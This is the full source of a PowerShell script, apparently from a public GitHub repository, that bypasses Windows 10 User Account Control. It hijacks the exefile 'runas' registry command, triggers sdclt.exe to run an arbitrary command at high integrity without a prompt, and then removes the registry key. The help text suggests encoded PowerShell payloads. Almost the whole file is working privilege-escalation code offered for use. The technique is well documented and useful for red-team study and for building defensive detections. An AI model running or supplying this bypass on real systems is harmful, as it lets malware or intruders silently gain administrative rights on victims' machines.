-
Notifications
You must be signed in to change notification settings - Fork 163
/
Invoke-SDCLTBypass.ps1
88 lines (69 loc) · 2.96 KB
/
Invoke-SDCLTBypass.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
function Invoke-SDCLTBypass {
<#
.SYNOPSIS
Bypasses UAC by hijacking the "IsolatedCommand" value in "shell\runas\command"
Only tested on Windows 10
Author: Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER Command
Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>"
Easiest test is "C:\Windows\System32\cmd.exe /c notepad.exe"
.EXAMPLE
Invoke-SDCLTBypass -Command "C:\Windows\System32\cmd.exe /c notepad.exe"
This will start notepad.exe in high-integrity context.
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,
[Switch]
$Force
)
$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
"UAC is set to 'Always Notify'. This module does not bypass this setting."
exit
}
else{
#Begin Execution
$exeCommandPath = "HKCU:\Software\Classes\exefile\shell\runas\command"
if ($Force -or ((Get-ItemProperty -Path $exeCommandPath -Name 'IsolatedCommand' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $exeCommandPath -Force |
New-ItemProperty -Name 'IsolatedCommand' -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Warning "Key already exists, consider using -Force"
exit
}
if (Test-Path $exeCommandPath) {
Write-Verbose "Created registry entries to hijack the exe runas extension"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
}
$sdcltPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'sdclt.exe'
if ($PSCmdlet.ShouldProcess($sdcltPath, 'Start process')) {
$Process = Start-Process -FilePath $sdcltPath -ArgumentList '/kickoffelev' -PassThru
Write-Verbose "Started sdclt.exe"
}
#Sleep 5 seconds
Write-Verbose "Sleeping 5 seconds to trigger payload"
if (-not $PSBoundParameters['WhatIf']) {
Start-Sleep -Seconds 5
}
$exefilePath = "HKCU:\Software\Classes\exefile"
if (Test-Path $exefilePath) {
#Remove the registry entry
Remove-Item $exefilePath -Recurse -Force
Write-Verbose "Removed registry entries"
}
if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
Stop-Process -Id $Process.Id
Write-Verbose "Killed running sdclt process"
}
}
}